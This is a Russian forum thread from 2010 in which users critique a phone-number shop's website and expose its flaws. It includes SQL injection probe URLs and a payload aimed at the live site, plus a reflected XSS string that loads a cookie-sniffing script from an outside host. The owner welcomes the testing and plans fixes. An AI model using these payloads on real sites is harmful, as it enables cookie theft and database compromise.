Онлайн-магазин красивых номеров МТС в СПб.
Спустя 1 час, 16 минут, 35 секунд (7.11.2010 - 03:03) Sanchopansa написал(а):
сайт красивый и все такое но есть одно НО!!!
писать нужно безопастные скрипты... хорошо что у сайта нет админ части.. но все равно тебе будет урок на будущее
вот и был взломан твой ВТОРОЙ сайт!!!
SQL-инъекция
ПС: почиттай про защиту кода
писать нужно безопастные скрипты... хорошо что у сайта нет админ части.. но все равно тебе будет урок на будущее
вот и был взломан твой ВТОРОЙ сайт!!!
SQL-инъекция
ПС: почиттай про защиту кода
Спустя 7 часов, 59 минут, 43 секунды (7.11.2010 - 11:03) freeeeez написал(а):
админ часть есть, запароленная!!! но если ты её не нашел то уже хорошо)))
спасибо за взлом!
прочитал про инъекции.
буду исправлять.
спасибо за взлом!
прочитал про инъекции.
буду исправлять.
Спустя 4 минуты, 53 секунды (7.11.2010 - 11:07) Sanchopansa написал(а):
пожалуйста
Я не спец в этом поэтому возможно и не нашел.. но сам факт присутствия инъекцие это зло.. Кто-то другой может найти...
И свой первый сайт тоже пересмотри на этот вопрос.. я больше чем уверен что там тоже есть такой промах!!!
конструкция
Спасла бы тебя
И еще момент... почуму данные из формы передаешь ГЕт запросом... передавай их постом.. так менее заметно
Я не спец в этом поэтому возможно и не нашел.. но сам факт присутствия инъекцие это зло.. Кто-то другой может найти...
И свой первый сайт тоже пересмотри на этот вопрос.. я больше чем уверен что там тоже есть такой промах!!!
конструкция
$id = (int)$_GET['id'];
Спасла бы тебя
И еще момент... почуму данные из формы передаешь ГЕт запросом... передавай их постом.. так менее заметно
Спустя 7 минут, 50 секунд (7.11.2010 - 11:15) aH6y написал(а):
Sanchopansa
GET в данной ситуации даже лучше т.к. можно давать ссылки людям уже на определённые номера иль на списки номеров.
А POST ломаеться так же как и GET.
GET в данной ситуации даже лучше т.к. можно давать ссылки людям уже на определённые номера иль на списки номеров.
А POST ломаеться так же как и GET.
Спустя 3 минуты, 1 секунда (7.11.2010 - 11:18) freeeeez написал(а):
Цитата |
И свой первый сайт тоже пересмотри на этот вопрос.. я больше чем уверен что там тоже есть такой промах!!! конструкция |
да полюбому!)
Цитата |
И еще момент... почуму данные из формы передаешь ГЕт запросом... передавай их постом.. так менее заметно |
не знаю, сделал так, наверное было где-то прочитано, но сломать Пост можно также? исправлю конструкции.
а ограничить на размер тоже надо?
$id = (int)$_GET['id',3];
Спустя 5 минут, 41 секунда (7.11.2010 - 11:24) aH6y написал(а):
freeeeez
Можешь не ограничивать на длину.
Да POST это такой же глобальный массив как и GET. И он ломаеться примерно одинаково.
Можешь не ограничивать на длину.
Да POST это такой же глобальный массив как и GET. И он ломаеться примерно одинаково.
Спустя 2 минуты, 44 секунды (7.11.2010 - 11:27) freeeeez написал(а):
Спасибо!
Зато от PHP инъекций, по крайней мере от простых, сайт защищен
Зато от PHP инъекций, по крайней мере от простых, сайт защищен
Спустя 34 минуты, 26 секунд (7.11.2010 - 12:01) Sanchopansa написал(а):
Я согласен что Гет в данном случае даже лучше но не везде же его использовать...
И я не в качестве защиты говорил сделать на пост запросах
И я не в качестве защиты говорил сделать на пост запросах
Спустя 1 час, 20 минут, 58 секунд (7.11.2010 - 13:22) inpost написал(а):
Корявая верстка:
http://my.jetscreenshot.com/demo/20101107-favz-185kb
А вот обычная уязвимость к sql-инфекции:
http://www.numberok.ru/katalog.php?number=...&fprice2=0&kat=
Достаточно в меню написать, где номер: 0' or kat='1
Это мелочь, просто демонстрирует, что доступ к БД я получил, теперь могу вводить любой код таким образом, вплоть даже стереть всю БД.
http://my.jetscreenshot.com/demo/20101107-favz-185kb
А вот обычная уязвимость к sql-инфекции:
http://www.numberok.ru/katalog.php?number=...&fprice2=0&kat=
Достаточно в меню написать, где номер: 0' or kat='1
Это мелочь, просто демонстрирует, что доступ к БД я получил, теперь могу вводить любой код таким образом, вплоть даже стереть всю БД.
Спустя 1 час, 21 минута, 38 секунд (7.11.2010 - 14:44) Sanchopansa написал(а):
да действительно.. ты закрыл нее все дыры.. больше читай про защиту кода...
http://www.numberok.ru/katalog.php?number=1'
http://www.numberok.ru/news.php?date=2010-07-21'
http://www.numberok.ru/devices.php?name=%CC%D2%D1'
http://www.numberok.ru/katalog.php?tariff=MaxiSuper'
Короче исправляй.... а то я начну искать админку и добывать пароли...
Соблазняешь
http://www.numberok.ru/katalog.php?number=1'
http://www.numberok.ru/news.php?date=2010-07-21'
http://www.numberok.ru/devices.php?name=%CC%D2%D1'
http://www.numberok.ru/katalog.php?tariff=MaxiSuper'
Короче исправляй.... а то я начну искать админку и добывать пароли...
Соблазняешь
Спустя 33 минуты, 24 секунды (7.11.2010 - 15:17) inpost написал(а):
Sanchopansa
Так и хочется взломать, зайти на сайт и подправить ошибки =)
Так и хочется взломать, зайти на сайт и подправить ошибки =)
Спустя 4 минуты, 56 секунд (7.11.2010 - 15:22) Sanchopansa написал(а):
Ага .. провацируют
Спустя 17 часов, 2 минуты, 44 секунды (8.11.2010 - 08:25) freeeeez написал(а):
Ок. Спасибо.
Сегодня буду закрывать все дырки.
Пробуй взломать админку! Буду знать=)
(только не выкладывай в общак, сам понимаешь)
Насчет верстки, реальный косяк.
Попробую что-нибудь подправить.
Сегодня буду закрывать все дырки.
Пробуй взломать админку! Буду знать=)
(только не выкладывай в общак, сам понимаешь)
Насчет верстки, реальный косяк.
Попробую что-нибудь подправить.
Спустя 2 часа, 7 минут, 38 секунд (8.11.2010 - 10:32) netruxa написал(а):
красивый сайт, особенно это понравилось
Сегодня мы не ломаем чужие сайты! =)
?nomer="><script+type="text/javascript"+src="http://balda4fun.ru/snif.js"></script>
Сегодня мы не ломаем чужие сайты! =)
Спустя 5 часов, 55 минут, 30 секунд (8.11.2010 - 16:28) ДиммКа написал(а):
есче багу нашел http://www.numberok.ru/news.php?date=99999...999999999999999 на главной странице картинки сим карт совсем не реалестичные слишком острые у них углы; еще слева в колонке картинка с графиком работы помоему лучше текстом заменить красивым... а так дизайн классный впечатляет, цены не высокие...
Спустя 10 минут, 50 секунд (8.11.2010 - 16:39) ДиммКа написал(а):
еще бага идем на страницу http://www.numberok.ru/katalog.php?fprice1=0&fprice2=1500 открываются списки номеров с ценой 1500 руб идем на страницу http://www.numberok.ru/katalog.php?fprice1=0&fprice2=1000 сдесь списки с ценой 1000 руб а теперь идем сюда http://www.numberok.ru/katalog.php?fprice1...rice2=1500-1000 открываются списки в 500 руб. тоесть срабатывает арифм.операция 1500-1000=500 т.е. скрипт не отфильтровал выражение сие! не знаю слишком ли это опасно но устранить не помешает
_____
короче поработать над безопастностью от sql инъекция надо
_____
короче поработать над безопастностью от sql инъекция надо
Спустя 4 минуты, 51 секунда (8.11.2010 - 16:44) Sanchopansa написал(а):
netruxa
А не хорошо ссылки на снифер делать!!!! За это можно и схлопотать от аминистрации
А не хорошо ссылки на снифер делать!!!! За это можно и схлопотать от аминистрации
Спустя 3 минуты, 44 секунды (8.11.2010 - 16:47) ДиммКа написал(а):
НЕТ САЙТ ОТСТОЙ В ПЛАНЕ БЕЗОПАСНОСТИ! там даже админка не без пароля, мол проходите кто хотите! но зато на папку со скриптами защиту поставили - вопрос где логика?
Спустя 12 минут, 3 секунды (8.11.2010 - 16:59) netruxa написал(а):
Цитата (Sanchopansa @ 8.11.2010 - 13:44) |
netruxa А не хорошо ссылки на снифер делать!!!! За это можно и схлопотать от аминистрации |
да лан, яж из благих побуждений.
сообщил бы потом автору его куки (если они конечно используются)
Спустя 2 часа, 1 минута, 3 секунды (8.11.2010 - 19:00) Sanchopansa написал(а):
ну скажи мне мои куки?
А в благих целях можно и алерт поставить и автор бы все понял
А в благих целях можно и алерт поставить и автор бы все понял
Спустя 14 часов, 27 минут, 29 секунд (9.11.2010 - 09:28) netruxa написал(а):
твоих кук на сайте http://www.numberok.ru не обнаружено